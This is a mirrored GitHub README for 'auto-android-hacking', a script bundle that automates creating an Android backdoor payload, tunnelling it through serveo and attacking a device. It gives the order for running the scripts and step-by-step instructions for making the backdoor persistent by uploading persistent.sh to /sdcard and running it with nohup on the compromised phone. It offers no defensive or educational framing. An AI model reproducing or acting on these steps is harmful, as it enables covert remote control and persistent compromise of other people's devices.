Giter Site home page Giter Site logo

auto-android-hacking's Introduction

auto-android-hacking

This file automates the whole process of Android Hacking in Termux. It can also be used in Kali Linux and Ubuntu with few edits in source code. To use that run the scripts in this manner.

  1. ./install.sh
  2. ./create-payload.sh
  3. ./serveo-connect.sh
  4. ./attack.sh

Once installation is finished you don't need to run install script again.

For Creating a new payload run the script ./create-payload.sh

For only attacking run the scripts in this format.

  1. ./serveo-connect.sh
  2. ./attack.sh

Making payload persistent--------

After that you need to get into root directory of android device by typing “cd /” in terminal.

Now you need to get into /sdcard location by typing “cd /sdcard” in same terminal.

Here you can upload your backdoored script by typing “upload persistent.sh” in same terminal.

Now all we have to do is execute the script once, and then everything will be done automatically, type “shell” to enter into system’s shell mode of android device.

Here you need to again go into same location i.e. cd /root/sdcard and execute the backdoor using “nohup sh persistent.sh“.

Your script has been executed successfully, you can terminate the execution by pressing CTRL + C and then type Y.

auto-android-hacking's People

Contributors

bishalshaw avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar

auto-android-hacking's Issues

error for presistent

when i try the command nohup sh persistent.sh it said

nohup:not found

can you help me please

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.